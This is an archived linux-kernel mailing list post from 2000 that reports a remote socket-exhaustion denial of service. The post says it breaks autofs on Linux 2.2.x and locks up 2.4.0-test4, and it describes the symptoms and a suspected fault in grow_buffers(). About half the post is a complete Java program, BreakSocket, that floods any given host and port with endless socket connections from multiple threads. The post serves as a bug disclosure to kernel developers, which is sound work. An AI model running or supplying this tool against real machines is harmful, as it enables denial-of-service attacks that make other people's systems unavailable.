I have an exploit, included at the bottom of this message, that breaks
autofs in the 2.2 series (tested against 2.2.14 and 2.2.16) and locks up
2.4.0-test4.
The exploit does nothing but opens sockets on a remote machine and leaves
them open (I've normally tested this against ssh, port 22). The remote
machine is adversely affected.
In 2.2.x, after the exploit has been running for a few minutes, and all
sockets available have been allocated (I believe), I terminate the
exploit. While the exploit is running, the victim machine will also
report "No More Processes". At this point, autofs will refuse to mount
anything. netstat reveals that the tremendous number of sockets opened by
the exploit have been closed. Mounting manually will work, and unmounting
manually will work. autofs stop will not.
In 2.4, at some point during the execution of the exploit the remote
machine will lock up. Using alt-sysrq to get a register dump, the failure
seems to be in grow_buffers(), in fs/buffer.c.
The exploit doesn't have any effect on sgi's, nor does it work against a
machine running amd and 2.2.14.
-Jim <hinoue@cs.unm.edu>
import java.net.*;
public class BreakSocket extends Thread
{
String host;
int port;
public BreakSocket(String host, int port)
{
this.host = host;
this.port = port;
}
public void run()
{
while(true)
{
try
{
while(true)
{
Socket s = new Socket(host, port);
}
}
catch(Exception e)
{
}
}
}
public static void main(String[] args) throws Exception
{
String host = "localhost";
int port = 22;
if ( args.length != 2 )
{
System.err.println("Usage <host> <port>");
System.exit(0);
}
host = args[0];
port = Integer.parseInt(args[1]);
while(true)
{
if ( Thread.activeCount() < 15 )
{
BreakSocket s = new BreakSocket(host, port);
s.start();
}
Thread.sleep(1500);
}
}
}
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/
This archive was generated by hypermail 2b29 : Mon Jul 31 2000 - 21:00:20 EST